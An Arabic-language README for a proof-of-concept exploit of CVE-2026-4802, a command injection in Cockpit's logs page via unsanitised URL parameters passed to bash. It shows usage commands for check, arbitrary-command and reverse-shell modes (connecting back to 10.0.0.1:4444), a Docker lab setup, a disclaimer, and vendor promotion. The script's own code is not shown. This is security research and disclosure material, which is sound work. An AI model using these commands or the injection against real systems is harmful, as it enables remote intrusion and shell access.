
إثبات مفهوم لاستغلال CVE-2026-4802، وهي ثغرة حقن أوامر في واجهة سجلات النظام في Cockpit، مما يتيح تنفيذ أوامر عشوائية وقذائف عكسية.
إثبات مفهوم لاستغلال CVE-2026-4802، وهو تنفيذ تعليمات برمجية عن بُعد عبر حقن الأوامر في واجهة سجلات النظام في Cockpit (loadServiceFilters())
قم ببناء وتشغيل البيئة القابلة للاستغلال:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# تحقق مما إذا كان الهدف قابلًا للاستغلال
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# تنفيذ أوامر عشوائية
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# قشرة عكسية
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444
pkg/systemd/logsJournal.jsx)تقوم الدالة loadServiceFilters() في pkg/systemd/logsJournal.jsx ببناء أوامر الصدفة عن طريق دمج المصفوفات في سلاسل نصية مع إضافة مسافات فقط قبل تمريرها إلى /bin/bash -ec. تصل المعاملات التي يتحكم فيها المستخدم من جزء عنوان URL لصفحة السجلات (مثل --since=) إلى هذا المسار البرمجي دون تنقية، مما يسمح بحقن محارف الصدفة مثل استبدال الأوامر ($(...)).
هذه الأداة مخصصة لأغراض تعليمية وبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
QuimeraX Intelligence هي منصة متقدمة لإدارة سطح الهجوم الخارجي (EASM) واستخبارات التهديدات السيبرانية، متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تراقب المنصة التهديدات الأمنية وتكتشفها وتنبه العملاء بشأنها بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم العثور على أنظمتهم قابلة للاستغلال، مما يمكنهم من اتخاذ إجراءات وقائية. اعرف المزيد
Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمون بالتميز التقني. نقدم حلولًا أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.